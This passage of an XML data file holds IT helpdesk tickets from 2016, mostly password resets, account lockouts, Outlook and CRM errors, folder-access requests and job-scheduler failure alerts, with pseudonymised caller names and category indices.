    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn while updating passwords"/>
    <s v="unable to connect to vpn while updating passwords"/>
    <s v="uyhceqzr tpbdwiyv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password expired"/>
    <s v="password expired"/>
    <s v="uyhceqzr tpbdwiyv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms crm dynamics error : outlook addin "/>
    <s v="ms crm dynamics error : outlook addin "/>
    <s v="eziswfym cehwzojy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wants crm mobile app to be donwloaded on mobile"/>
    <s v="user wants crm mobile app to be donwloaded on mobile"/>
    <s v="kupqvfaz mvcnylsx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access denied to collaboration_platform."/>
    <s v="i cannot access or go to libraries in collaboration_platform. i need to access this for applications support calls and e-mails. i'm having to transfer to other members, or put the calls on hold while someone else may be available to search for me._x000d__x000a_this is the message i am getting. _x000d__x000a__x000d__x000a_if this problem persists, contact your support team and include these technical details: _x000d__x000a_correlation id: eb36aa9d-a0d2-3000-b1d3-a16127465a9a _x000d__x000a_date and time: 10/4/2016 12:53:18 pm _x000d__x000a_user: wfzgituk.rxvqzopt@gmail.com _x000d__x000a_issue type: user does not have permissions. "/>
    <s v="wfzgituk rxvqzopt"/>
    <x v="15"/>
  </r>
  <r>
    <s v="need crm added to outlook ribbon in microsoft outlook for crm mfg_tooltion"/>
    <s v="need crm added to outlook ribbon in microsoft outlook for crm mfg_tooltion"/>
    <s v="kupqvfaz mvcnylsx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power management query "/>
    <s v="power management query "/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2-unable to load collaboration_platform site"/>
    <s v="unable to load collaboration_platform site"/>
    <s v="ihozauxs ohdqmipz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company home page not loading"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gvcfhwjy.lyxcorqb@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35e4a.ce720dc0]_x000d__x000a__x000d__x000a_best "/>
    <s v="gvcfhwjy lyxcorqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa me access to : t:\finance\corporateaccounting\partner\cash &amp; bank reconciliations\misc. cash\account 10134141"/>
    <s v="from: pjxclyhs fcniljtu _x000a_sent: tuesday, october 04, 2016 6:59 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: jwoiyzfp zlftrkpq; liz domasky_x000a_subject: trupthyti fw: folder access -ticket_no1556086_x000a__x000a_please usa me read only access to the following folder:_x000a__x000a_t:\finance\corporateaccounting\partner\cash &amp; bank reconciliations\misc. cash\account 21245252_x000a__x000a__x000a_kind "/>
    <s v="pjxclyhs fcniljtu"/>
    <x v="33"/>
  </r>
  <r>
    <s v="lhqsm68267( patching_antivirus_sw  prod ):node lhqsm68267 located at usa is down since 3:04 pm et on 10/04."/>
    <s v="lhqsm68267( patching_antivirus_sw  prod ):node lhqsm68267 located at usa is down since 3:04 pm et on 10/04."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to load outlook"/>
    <s v="unable to load outlook"/>
    <s v="utdlmzyb dvfpraeg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform not working ; server is busy /unavailable "/>
    <s v="collaboration_platform not working ; server is busy /unavailable "/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="urgent help required- outlook to crm mfg_tooltion issue."/>
    <s v="royhtub haujtimpton,_x000a_unable to access crm thru outlook."/>
    <s v="dbroehva dgcyvxhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="change of owner on collaboration_platform link"/>
    <s v="change of owner on collaboration_platform link"/>
    <s v="kvrmnuix yicpojmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="coffee spillage on keybankrd "/>
    <s v="coffee spillage on keybankrd "/>
    <s v="fwgdbatq qgownfkv"/>
    <x v="2"/>
  </r>
  <r>
    <s v="can you please check â€“ marftgytin hÃ¶pfner (userid: hoepftyhum, # 59146) gets the crm error message when trying to open the &quot;fore"/>
    <s v="can you please check â€“ marftgytin hÃ¶pfner (userid: hoepftyhum, # 59146786) gets the crm error message when trying to open the &quot;forecast to plan&quot; dashbankrd."/>
    <s v="karoyclq ivlabkhu"/>
    <x v="22"/>
  </r>
  <r>
    <s v="saved over excel file"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qzixratf.wrygjncl@gmail.com_x000d__x000a__x000d__x000a_i have accidentally 'saved as' an excel spreadsheet over another file. is there a way to recover to a few days ago?_x000d__x000a__x000d__x000a_"/>
    <s v="qzixratf wrygjncl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="query on crm app"/>
    <s v="query on crm app"/>
    <s v="dpcxyjlz fuqzbetw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer -08"/>
    <s v="configure the id 08 printer on the laptop."/>
    <s v="kdhztcva smpynjae"/>
    <x v="18"/>
  </r>
  <r>
    <s v="locked out of poruxnwb yfaqhceo"/>
    <s v="received from: hwbukcsm.hwobikcv@gmail.com_x000d__x000a__x000d__x000a_hi there,_x000d__x000a__x000d__x000a_i tried changing my password in the poruxnwb yfaqhceo yesterday (oracle fusion middleware â€“ production 11g) and after entering my old and new passwords, the log in box kept popping up but did not let me log in. i somehow backed out of it and it let me access the system._x000d__x000a__x000d__x000a_today neither the old or new password will work. i have had this happen in the past and szewiguc nvajphfm would unlock it for me._x000d__x000a__x000d__x000a_can someone help me get this corrected?_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="hwbukcsm hwobikcv"/>
    <x v="1"/>
  </r>
  <r>
    <s v="no audio on lat 7350"/>
    <s v="no audio on lat 7350"/>
    <s v="gbirhjat fptbrhwv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="kiqrvwat gwkpxzyt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: south_amerirtca, south_amerirtca vpn router is down at 12:23 pm et on 10/04. site is up on primary."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no    (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______12:23 pm et on 10/04._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na________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na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issues with user profiles on HostName_108"/>
    <s v="user profiles seem to be messed up on this server and not creating. when trying to investigate a monitoring_tool monitoring issue i came across the error message in the attached screenshot._x000d__x000a__x000d__x000a_please investigate. "/>
    <s v="boxrlpec fnkhwytl"/>
    <x v="11"/>
  </r>
  <r>
    <s v="renew internal certificate for password_management_tool id password manager"/>
    <s v="hello ,_x000a__x000a_as discussed, please assist on renewing the internal certificate for password_management_tool id password manager tool._x000a__x000a_"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="38"/>
  </r>
  <r>
    <s v="ticket upadate on :inplant_866142"/>
    <s v="ticket upadate on :inplant_866142"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset "/>
    <s v="erp SID_34 password reset "/>
    <s v="varldgiw hfyogqnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1387 failed in job_scheduler at: 10/04/2016 11:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1387 failed in job_scheduler at: 10/04/2016 11:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="urgent : not able to share company catalog data with external user..."/>
    <s v="_x000a_summary:who can help me with collaboration_platform issues?_x000a_i have shared directory and files on collaboration_platform with an external user, but it is telling me &quot;only you&quot; under the shared with column"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="15"/>
  </r>
  <r>
    <s v="users at usa are not receiving inbound external calls"/>
    <s v="users at usa are not receiving inbound external calls_x000d__x000a__x000d__x000a_internal extension to extension calls are working and outbound calls are working _x000d__x000a_"/>
    <s v="gvxfymjk euioadyf"/>
    <x v="36"/>
  </r>
  <r>
    <s v="missing email access:  k-amerirtcas.hrss@company.com"/>
    <s v="i previously had access to the amerirtcas_hrssc mail box on outlook, but it is no longer available to me.  can this be re-set up?_x000a__x000a_vpksyfco chosuygq_x000a__x000a_"/>
    <s v="vpksyfco chosuygq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock and reset password user ( vvamrtryot ) "/>
    <s v="just to inform you that user vvamrtryot seems has expired the password in SID_21, SID_1, SID_34._x000d__x000a_we couldn't proceed checking, can you also reset the password?_x000d__x000a_"/>
    <s v="gdsjrxwl pzhyxdiq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook stuck on processing "/>
    <s v="outlook stuck on processing "/>
    <s v="hybiaxlk lawptzir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp gui is missing login options for xhaomnjl ctusaqpr"/>
    <s v="erp gui is missing login options for xhaomnjl ctusaqpr"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="xhaomnjl ctusaqpr called for erp account unlock"/>
    <s v="xhaomnjl ctusaqpr called for erp account unlock"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows acccount lockout"/>
    <s v="windows acccount lockout"/>
    <s v="rguyoajm zfcquswp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update inwarehouse_tool documents from list for sales org 12032, 12035 and 12036"/>
    <s v="with the germany office move the main inwarehouse_tool printer fd37v got temporarily totally deleted by accident from erp. a big bulk of inwarehouse_tools was already reissued, but there are billing documents dated august 26 - 29, 2016 that do not have any output yet at all. - see lists attached._x000d__x000a__x000d__x000a_if an update is done on the billing via vf02, the correct output type gets automatically added. therefore we need to have a mass update done (just go to change mode and save), so that the missing printouts get added and issued to the appropriate printer. (billings with existing output might be amongst the list, these are good and no action is required.)_x000d__x000a__x000d__x000a_*************_x000d__x000a_important: *_x000d__x000a_*************_x000d__x000a_if the mass update is done, please don't do it any any regular billing job times and note the issued documents from erp spool. the list of billings attached might also have documents with output assigned to other printers than fd37v. these billings are correct._x000d__x000a_accounting department, however, would need to have a list of all billings where the output now would get generated, as the customer might get reminders or dunnings for the same. we need to clearly trace these billing documents with output only now generated for audit reasons. we need to get the print outs as soon as possible. please help to support this request as soon as possible as some customers get annoyed with wrong dunnings._x000d__x000a__x000d__x000a_if you have questions, don't hesitate to contact me. _x000d__x000a_"/>
    <s v="mynfoicj riuvxdas"/>
    <x v="12"/>
  </r>
  <r>
    <s v="clients laptop will not turn on"/>
    <s v="clients laptop will not turn on"/>
    <s v="zhvrtnom waedkqzj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="rkimfqta oepigwmr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="product management master, key figures dierppear "/>
    <s v="sample before refresh_x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a_after refresh_x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="uwofavej hxyatnjc"/>
    <x v="8"/>
  </r>
  <r>
    <s v="i received an error when trying to log in to do my ethics for q2."/>
    <s v="error i received says &quot;our records indicate your log in credentials used to access the site from the company's collaboration_platform do not match the records we have on file within the active directory.&quot;"/>
    <s v="jmxrabzy dpyvjcxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email address: dbryhtuown@task.com has been newly blocked from sending attachments. please remove the block."/>
    <s v="email address: dbryhtuown@task.com has been newly blocked from sending attachments. please remove the block."/>
    <s v="lkmhgiwv omkfxdcq"/>
    <x v="26"/>
  </r>
  <r>
    <s v="erp font small."/>
    <s v="i've received a new laptop (latitude 7275), after the image installation the  (erp) has e very little definition. when i try to logon i can see only very little charatcher.. do you have some indications ?"/>
    <s v="cgxhmrvu dbwspjet"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype login after changing password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: doxiqkws.uvrzcqmf@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i recently changed my company network password (log in, email, vpn, etc.) and cannot sign in to skype for business anymore. i get a notification saying there was a problem acquiring a personal certificate:_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35e11.eafad4b0]_x000d__x000a__x000d__x000a_any assistance you can provide would be greatly appreciated._x000d__x000a__x000d__x000a_"/>
    <s v="doxiqkws uvrzcqmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="second monitor not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iqcylpok.ascpqvni@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_my second monitor stopped working, cannot get a picture on it. can someone please come and take a look at it? "/>
    <s v="iqcylpok ascpqvni"/>
    <x v="2"/>
  </r>
  <r>
    <s v="reset the password for fueiklyv jargqpkm on erp / production / erp"/>
    <s v="please reset my password for SID_34 erp production and SID_37 bw production"/>
    <s v="fueiklyv jargqpkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i need removed from my profile"/>
    <s v="i updated my profile in the new single sign on and yet still appears.  it has affected my number in outlook as well as anyone who has me in their contact list.  the only number that should be associated with my profile is .  if you do an employee search from outlook you will see the number."/>
    <s v="yrhnxpvi drlbzqpi"/>
    <x v="19"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ apokrfjv.mdiepcul@gmail.com _x000a_â€¢ first name: donnathyr _x000a_â€¢ last name: welling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
    <s v="apokrfjv mdiepcul"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool ws ewew8323843 funktioniert nicht \jionmpsf wnkpzcmv"/>
    <s v="EU_tool ws ewew8323843 funktioniert nicht \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="bluescreen ewew8323733 \wrcktgbd wzrgyunp"/>
    <s v="hallo ,_x000d__x000a__x000d__x000a_mein pc zeigt blaue seite mit vielen weiÃŸen buchstaben._x000d__x000a_pc nr. 212622_x000d__x000a_typ: optiplex 790_x000d__x000a__x000d__x000a_bitte helfen!_x000d__x000a__x000d__x000a_best "/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="key figure dierppears -  urgent refer :inplant_866405"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uwofavej.hxyatnjc@gmail.com_x000d__x000a__x000d__x000a_while updating existing product management master, key figures dierppear and if shown in columns also columns dierppear and download is distrtgoyed_x000d__x000a__x000d__x000a_last month we have had the same issue as anybody made changes on the product management master_x000d__x000a_pallutyr pande corrected it back, maybe you can involve her again_x000d__x000a__x000d__x000a_we are very bussy with month end  data and immediately need the correct settings as they have been before._x000d__x000a__x000d__x000a_sample : before refresh_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="uwofavej hxyatnjc"/>
    <x v="8"/>
  </r>
  <r>
    <s v="skype issue : personal certificate error "/>
    <s v="skype issue : personal certificate error "/>
    <s v="keinyujo torvxeda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="_x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ icyxtqej.lqsjrgzt@gmail.com _x000a_â€¢ first name: hyeonthygwon _x000a_â€¢ last name: lethre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
    <s v="icyxtqej lqsjrgzt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account got locked"/>
    <s v="account got locked"/>
    <s v="edrglpvu ihpzqksy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system took a long time to respond after a password reset."/>
    <s v="system took a long time to respond after a password reset._x000d__x000a_stack guard error came up with outlook."/>
    <s v="vncowmbd hyfzcqpi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user lndypaqg dhqwtcsr (gogtyekthyto) hat sein passwort in erp SID_34 verggermany. "/>
    <s v="user lndypaqg dhqwtcsr (gogtyekthyto) hat sein passwort in erp SID_34 verggermany. "/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to expense reimbursement webpage."/>
    <s v="unable to connect to expense reimbursement webpage._x000d__x000a_page fails to load"/>
    <s v="jziwhldq qslwyozu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="distributor_tool does not have a list of favorite customers"/>
    <s v="issue occurred after a recent password change."/>
    <s v="jvpqlgib yuhcljqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="gurts lrupiepens email forwarding"/>
    <s v="_x000a__x000a_received from: hpqjaory.gfrwmije@gmail.com_x000a__x000a_gurts lrupiepens left company's usa, il facility on september 30, 2016._x000a_i am assuming partial responsibilities for gus. can you please set up email forwarding_x000a_for any correspondences to my email address?_x000a__x000a_please advise if there is anything else required on my part or my manager, xpoqcrtb zwrypjqv._x000a__x000a_"/>
    <s v="hpqjaory gfrwmije"/>
    <x v="26"/>
  </r>
  <r>
    <s v="please reset my password for hana SID_60,SID_59,SID_58"/>
    <s v="please reset my password for hana SID_60,SID_59,SID_58 for userid:bathishry"/>
    <s v="oncidblt ucewizyd"/>
    <x v="52"/>
  </r>
  <r>
    <s v="erp password reset : erp SID_34"/>
    <s v="erp password reset : erp SID_34"/>
    <s v="ranjhczs qvcwptbr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_113 : rfcserver.exe process count service is down at 8:11 am et on 10/04."/>
    <s v="HostName_113 : rfcserver.exe process count service is down at 8:11 am et on 10/04."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="xceliron process where pos are auto received is not working as designed resulting in blocked inwarehouse_tools."/>
    <s v="xceliron process where pos are auto received is not working as designed resulting in blocked inwarehouse_tools resulting in additional work for the ap and buyer who cannot control this process.  please correct the missing goods receipts on the attached file and make a permanent correction so that goods receipts are done in a timely fashion going forward.  please do not close this ticket until a permanent fix is uacyltoe hxgayczeed and in place.  "/>
    <s v="xkmvpaei fizqoprk"/>
    <x v="29"/>
  </r>
  <r>
    <s v="crm app on ios10"/>
    <s v="crm app on ios10"/>
    <s v="jziwhldq qslwyozu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="schnafk - docking station needs replacement"/>
    <s v="desk: 455 - cubicle number in the customer service department - usa_x000a__x000a_phone number: _x000a__x000a_laptop model: latitude e5450_x000a__x000a_direct connection to monitors work, through docking station, no go."/>
    <s v="toeibhlp gukqjwnr"/>
    <x v="2"/>
  </r>
  <r>
    <s v="collaboration_platform access"/>
    <s v="_x000a__x000a_received from: frydqbgs.ugmnzfik@gmail.com_x000a__x000a_hello all,_x000a__x000a_the project documentation under the collaboration_platform links below is no longer accessible with error message_x000a_jaytya created it, but he left meanwhile, perhaps deactivation of his account could be the reason. anyway, please help to get access again or provide instruction to change owner. "/>
    <s v="frydqbgs ugmnzfik"/>
    <x v="15"/>
  </r>
  <r>
    <s v="unable to sign in to skype"/>
    <s v="unable to sign in to skype"/>
    <s v="sprzgqyv uxpjtgaw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="view drawing in engineering tool, erp gui and business_client take 3x as long as normal"/>
    <s v="since a couple days we see huge performance issues in fue to view drawings from erp._x000d__x000a_"/>
    <s v="tghrloks jbgcvlmf"/>
    <x v="13"/>
  </r>
  <r>
    <s v="updation required in flash player"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ipydfcqo.kdxsquzn@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please find below compatibility check getting while launching ethics._x000d__x000a__x000d__x000a_kindly go thru and do the needful._x000d__x000a__x000d__x000a_[cid:image011.jpg@01SID_35e5d.aeae3550]_x000d__x000a__x000d__x000a_system details is provided below for your quick view._x000d__x000a_[cid:image012.png@01SID_35e5d.aeae3550]_x000d__x000a__x000d__x000a_"/>
    <s v="ipydfcqo kdxsquzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="plm-engineering tool:  pdf-files can not be opened. error attached."/>
    <s v="_x000d__x000a__x000d__x000a_received from: tgafnyzb.hnevrcuj@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_das Ã¶ffnen von pdf-files aus engineering tool dauert heute extrem lange. manchmal erscheint auch diese meldung, ohne dass das file geÃ¶ffnet wird:_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35e3f.829dfa90]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="tgafnyzb hnevrcuj"/>
    <x v="13"/>
  </r>
  <r>
    <s v="info type '0017' is missing to personal number 56567040"/>
    <s v="from: qkmvosen opundxsk _x000a_sent: tuesday, october 04, 2016 4:10 pm_x000a_to: nyifqpmv kfirxjag_x000a_subject: travel expense manager_x000a__x000a_hello,_x000a__x000a_transaktion  pr05 doesnÂ´t work for personal number 56567040._x000a__x000a_please check._x000a__x000a_"/>
    <s v="qkmvosen opundxsk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="probleme mit ie \vzqomdgt jwoqbuml"/>
    <s v="probleme mit ie \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="sinic allgemeiner fehler: 3155 odbc vmsliazh ltksxmyv driver abfragetimeout \jionmpsf wnkpzcmv"/>
    <s v="sinic allgemeiner fehler: 3155 odbc vmsliazh ltksxmyv driver abfragetimeout \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit drucker we110 \fdyietau dvsyxwbu"/>
    <s v="hallo ,_x000d__x000a__x000d__x000a_unser kopierer im schulungsraum ist auch defekt (minolta we 110)._x000d__x000a__x000d__x000a_kannst du bitte mal nachschauen._x000d__x000a_"/>
    <s v="fdyietau dvsyxwbu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/04/2016 06:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/04/2016 06:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="msd crm"/>
    <s v="urgent help required, i cant link an appointment to an account. i have the crm tab on outlook, but when i enter an appointment and go to set regarding and put in the account, nothing comes to the account for an appointment."/>
    <s v="qmpobijv wamtbupd"/>
    <x v="39"/>
  </r>
  <r>
    <s v="job Job_1355 failed in job_scheduler at: 10/04/2016 05:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1355 failed in job_scheduler at: 10/04/2016 05:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="outlook issues - does not pull /send emails - delay up to 1 hour"/>
    <s v="login: peathryucoj1_x000a_i have issues with my emails in outlook today. _x000a_there are delays with pulling emails and sending out._x000a_i am getting my emails with almost an hour delay._x000a_i also have issues with sending out my emails. _x000a_they are hanging in my outbox for a long time until they finally go out._x000a_"/>
    <s v="repyzajo lxfwopyq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot pick calls up from my phone"/>
    <s v="ebhl8111120 does not ring when there is a call."/>
    <s v="npfkbdxo vdyltfzx"/>
    <x v="6"/>
  </r>
  <r>
    <s v="infopath is not working."/>
    <s v="infopath is not working."/>
    <s v="sxhcapoe kbluefip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked. password reset request."/>
    <s v="account locked. password reset request."/>
    <s v="edrglpvu ihpzqksy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to \\891245132\scan"/>
    <s v="_x000a_zugriff auf verzeichnis angefragt._x000a_folder access requested._x000a__x000a_benutzer id ?_x000a_user id ?ahujajtyhur_x000a__x000a_benutzer die position titel?_x000a_user's position title ?executive sales admin_x000a__x000a_verzeichnis? _x000a_folder ?\\891245132\scan_x000a__x000a_art des zugriffs?_x000a_type of access ? (read only or full control) ?full_x000a__x000a_name des vorgesetzten?_x000a_manager name?cobsfvjz apkqmrdu_x000a__x000a_received from: ohdrnswl.rezuibdt@gmail.com_x000a__x000a_hi,_x000a__x000a_please help to assign scanner to my system 891245132._x000a__x000a_best "/>
    <s v="ohdrnswl rezuibdt"/>
    <x v="18"/>
  </r>
  <r>
    <s v="need your help!! "/>
    <s v="_x000a__x000a_received from: ezwcpqrh.bnwqaglk@gmail.com_x000a__x000a_hello it desk,_x000a__x000a__x000a_i sent this emal thru the web mail, as i can not open the ms office outrlook, due to the error message below._x000a__x000a__x000a_the error message says &quot; cannot create new gard page of stack.&quot;   as of things, i just changed my pass word recently with accordance to the auto notification from system._x000a__x000a__x000a_please help me to solve this trouble quickly and start to use outlook for my daily work._x000a__x000a__x000a_my email address is_x000a__x000a_ezwcpqrh.bnwqaglk@gmail.com_x000a__x000a__x000a_id is_x000a__x000a_yathryu_x000a__x000a__x000a_mobile phone is_x000a__x000a__x000a__x000a_your asistance is highly appreciated._x000a__x000a__x000a_best "/>
    <s v="ezwcpqrh bnwqaglk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="7350 wifi not connecting"/>
    <s v="7350 wifi not connecting"/>
    <s v="gtrspvoq dbkuhjvf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="rguyoajm zfcquswp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm- extensions - forecast view"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_under crm â€“ extensions â€“ the &quot;forecast&quot; button is gone. instead we have now &quot;potential spends&quot; . can someone please readd the &quot;forecast&quot;._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35e2d.85e00b60]_x000d__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="39"/>
  </r>
  <r>
    <s v="app probleme"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ecoljnvt.lbdqmvfs@gmail.com_x000d__x000a__x000d__x000a_hallo kollegen,_x000d__x000a__x000d__x000a_in meinem outlook kommt ein feld dass ein app â€“ problem vorhanden ist._x000d__x000a__x000d__x000a_was ist zu tun?_x000d__x000a__x000d__x000a_[cid:image003.jpg@01SID_35e28.2c1d0470]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="ecoljnvt lbdqmvfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number? 5019296276/00001_x000d__x000a__x000d__x000a_what material or item number? 7380698_x000d__x000a__x000d__x000a_what warehouse location?  plant_108_x000d__x000a__x000d__x000a_issue description / error message? no---"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="29"/>
  </r>
  <r>
    <s v="unable to do ethics course. have not received a mail from ethics since a very long time."/>
    <s v="mr. kothyherr has not received any mail from ethics since a long time. he thinks he should have received at least 2-3 mails during this period. that is why he is unable to do the course. _x000a_he insists ethics to look into it._x000a__x000a__x000a__x000a_received from: ecoljnvt.lbdqmvfs@gmail.com_x000a__x000a_hallo kollegen,_x000a__x000a_ich sollte eigentlich meine ethics vorgÃ¤nge abarbeiten._x000a__x000a_dazu habe ich jedoch keinerlei erinnerungsinformationen bekommen noch einen link wie ich in das portal komme._x000a__x000a_deswegen habe ich versucht Ã¼ber hub in das portal zu kommen._x000a__x000a_dazu habe ich auf login  gedrÃ¼ckt!_x000a__x000a_[cid:image005.jpg@01SID_35e26.0dda3340]_x000a__x000a_dann auf den button deutsch._x000a__x000a_[cid:image006.jpg@01SID_35e26.0dda3340]_x000a__x000a_dann kommt jedoch keine offene session!_x000a__x000a_was ist zu tun?_x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="ecoljnvt lbdqmvfs"/>
    <x v="23"/>
  </r>
  <r>
    <s v="frequent account locked out"/>
    <s v="frequent account locked out"/>
    <s v="gxawkhsq xqrczonv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="tigwlquj evynjiar"/>
    <x v="0"/>
  </r>
  <r>
    <s v="prognose crm - forecast to plan dashbankrd not working - resource not found error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_not only the one user is affected we got other sales reps indicating that they can't open the crm forecast to plan dashbankrd and get the &quot;resource not found error&quot;._x000d__x000a__x000d__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="22"/>
  </r>
  <r>
    <s v="outlook is not updating."/>
    <s v="outlook is not updating."/>
    <s v="pltkqrfd bfohnjmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 10/04/2016 03:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 10/04/2016 03:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="i am still unable to &quot;salesperson&quot; and &quot;uacyltoe hxgaycze performed by&quot; in engineering_tool.could you help me?"/>
